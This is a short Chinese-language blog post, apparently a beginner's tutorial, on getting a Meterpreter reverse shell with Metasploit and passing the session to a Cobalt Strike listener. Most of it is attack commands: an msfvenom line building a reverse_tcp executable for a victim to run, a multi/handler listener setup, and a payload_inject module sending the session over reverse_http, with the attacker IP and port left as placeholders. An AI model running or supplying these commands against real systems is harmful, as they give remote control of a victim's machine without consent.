美文网首页
msf派生shell到cs

msf派生shell到cs

作者: wssmile | 来源:发表于2021-03-23 10:32 被阅读0次

1 msf获取shell

这里已经在用msf生成了exe

然后直接msf开启监听然后获取shell

msf生成exe的payload为

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

然后msf进行监听开始获取shell

这里设置的端口要与自己生成exe的端口设置相同,否则会监听失败。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx(设置的ip地址)

set port xxxx(设置的端口号)

run

然后在靶机上直接打开exe即可。

2 msf反弹shell到cs

background 

返回到msf操作界面。

如图我们获取的shell为session 1

我们如果要反弹shell 到cs上的话

首先先在cs上设置一个监听。

点击耳麦图标,然后EDIT

这里我选择的是http方式连接,然后这次的port不用设置与生成exe的端口相同,这里我的为1234,随意多少都行。

然后我们开始往cs上派生。

因为cs上设置的为http连接,所以我们下边payload也要对应的设置为reverse_tcp

use exploit/windows/local/payload_inject 

set payload windows/meterpreter/reverse_http

set lhost xx.xx.xx.xx(ip地址)

set lport 1234(cs设置监听的端口)

set session 1(上边我们获取shell的session为1)

run

如图cs上线成功

小白小白小白~

大佬勿喷~

相关文章

网友评论

      本文标题:msf派生shell到cs

      本文链接:https://www.haomeiwen.com/subject/oqnxhltx.html